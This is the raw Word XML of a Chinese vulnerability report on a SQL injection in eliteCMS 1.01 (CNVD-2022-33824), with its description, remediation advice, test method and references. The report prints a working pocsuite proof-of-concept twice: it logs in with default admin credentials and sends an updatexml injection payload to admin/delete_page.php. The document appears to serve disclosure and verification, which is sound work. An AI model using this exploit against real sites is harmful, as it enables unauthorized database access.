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漏洞对象：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">eliteCMS存在SQL注入漏洞 </w:t>
      </w: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过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>风险管理及规避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修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>edit_post.php的漏洞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对G</w:t>
      </w:r>
      <w:r>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式传入的值进行安全过滤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以防止sql注入。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</w:rPr>
        <w:t>测试方法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直接对网站进行抓包，将GET中传入的id值改为sql的sleep语句，之后放回，发现经过3s传来响应，证明存在sql漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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测试中所用的工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Burp Suite Professional 1.7.37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p</w:t>
      </w:r>
      <w:r>
        <w:t>hpstudy 8.1.1.4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  <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="1" w:name="_Toc11461"/>
      <w:bookmarkStart w:id="2" w:name="_Toc19260"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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POC插件编写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pocsuite.api.request import req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pocsuite.api.poc import register,Output, POCBase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pocsuite.thirdparty.guanxing import  parse_ip_port, http_packet, make_verify_url, dnslog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TestPOC(POCBase):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cveID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cnvdID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cnnvdID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author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desc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solution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severity = ''''''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vulType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taskType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references = ['''''']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appName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appVersion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appPowerLink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samples = ['']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install_requires = ['''''']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_attack(self):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self._verify()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_verify(self):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self.url,ip,port = parse_ip_port(self.target, 80)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 = req.session()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'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',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'Content-Type':'application/x-www-form-urlencoded',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'Referer':self.url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= '/eliteCMS/admin/login.php'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 = '''user_name=admin&amp;password=admin&amp;submit=Login'''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vulur = make_verify_url(self.url, path, mod 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base_resp = s.post(vulur, headers = headers, verify = False, allow_redirects = False, timeout = 10, data = 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base_resp.status_code == 302 and 'Back to Website' in base_resp.content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= '''/eliteCMS/admin/delete_page.php?page=11111+or+updatexml(1,concat(0x7e,(version())),0)%23'''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vulurl = make_verify_url(self.url, path, mod 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 = s.get(vulurl, headers = headers, verify = False, allow_redirects = False, timeout = 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"~5.7.26" in resp.content and resp.status_code == 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 = http_packet(resp)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result['VerifyInfo']['URL'] = vulurl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result['VerifyInfo']['port'] = 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self.parse_output(result)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parse_output(self, result):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#parse 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= Output(self)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result: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output.success(result)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output.fail('Internet nothing returned')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output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register(TestPOC)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漏洞信息</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="4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SQL注入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2022-07-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 xml:space="preserve">    2022-07-21 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>01:04:0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ind w:left="7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27A6A8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27A6A8"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "http://www.cnvd.org.cn/flaw/show/CNVD-2022-33824" \t "https://poc.shuziguanxing.com/" \l "/_blank" </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="27A6A8"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olor w:val="27A6A8"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>CNVD-2022-33824</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="27A6A8"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p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NK-11-XMH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elitecms Elitecms 1.01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Elite Graphix Elite Cms是印度Elite Graphix公司的一个用Php语言编写的Web内容管理。用于存储和组织信息和文档的平台。 Elite Graphix Elite Cms存在SQL注入漏洞，该漏洞由于缺少对外部输入SQL语句的验证，攻击者可利用该漏洞执行非法SQL命令。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admin/delete_page.php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delete_page对一些get方式传递的参数未作一定的过滤，导致SQL注入</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="7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276850" cy="3495675"/>
                  <wp:effectExtent l="0" t="0" r="0" b="952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instrText xml:space="preserve"> HYPERLINK "https://www.cnvd.org.cn/patchInfo/show/331666" \t "https://poc.shuziguanxing.com/" \l "/_blank" </w:instrText>
            </w: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27A6A8"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>https://www.cnvd.org.cn/patchInfo/show/331666</w:t>
            </w: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instrText xml:space="preserve"> HYPERLINK "https://zjic.zj.gov.cn/art/2022/5/30/art_1707_1777414.html" \t "https://poc.shuziguanxing.com/" \l "/_blank" </w:instrText>
            </w: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27A6A8"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>https://zjic.zj.gov.cn/art/2022/5/30/art_1707_1777414.html</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="27A6A8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pStyle w:val="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pocsuite.api.request import req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pocsuite.api.poc import register,Output, POCBase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pocsuite.thirdparty.guanxing import  parse_ip_port, http_packet, make_verify_url, dnslog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class TestPOC(POCBase):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cveID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cnvdID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cnnvdID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version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author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vulDate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createDate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updateDate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desc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solution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severity = '''''' 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vulType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taskType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references = ['''''']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appName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appVersion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appPowerLink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samples = ['']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install_requires = ['''''']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_attack(self):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self._verify()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_verify(self):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self.url,ip,port = parse_ip_port(self.target, 80)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 = {}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 = req.session()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headers = {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'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36',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'Content-Type':'application/x-www-form-urlencoded',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'Referer':self.url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path = '/eliteCMS/admin/login.php'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data = '''user_name=admin&amp;password=admin&amp;submit=Login'''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vulur = make_verify_url(self.url, path, mod = 0)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base_resp = s.post(vulur, headers = headers, verify = False, allow_redirects = False, timeout = 10, data = data)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base_resp.status_code == 302 and 'Back to Website' in base_resp.content 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path = '''/eliteCMS/admin/delete_page.php?page=11111+or+updatexml(1,concat(0x7e,(version())),0)%23'''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vulurl = make_verify_url(self.url, path, mod = 0)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 = s.get(vulurl, headers = headers, verify = False, allow_redirects = False, timeout = 10)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"~5.7.26" in resp.content and resp.status_code == 200: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result['VerifyInfo'] = http_packet(resp)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result['VerifyInfo']['URL'] = vulurl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result['VerifyInfo']['port'] = port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self.parse_output(result)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parse_output(self, result):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#parse output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output = Output(self)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result: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output.success(result)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output.fail('Internet nothing returned')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output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</w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>register(TestPOC)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厂商已发布了漏洞修复程序，请及时关注更新：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https://github.com/jsjbcyber/bug_report/blob/main/bug_d 修改了edit_post.php的漏洞</w:t>
            </w:r>
            <w:bookmarkStart w:id="3" w:name="_GoBack"/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eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/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NDRkYTExYWE0YjljY2Y3MjgwNzc0MTliNWVjOGMifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="16626ECB"/>
    <w:rsid w:val="57FF41DD"/>
    <w:rsid w:val="7C1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754</Words>
  <Characters>3687</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>4</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4162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2022-07-21T00:50:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>雪泥鸿影</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-22T01:51:06Z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4FE8DFC84C4F4DC7B95BE2FD99626089</vt:lpwstr>
  </property>
</Properties>
</file>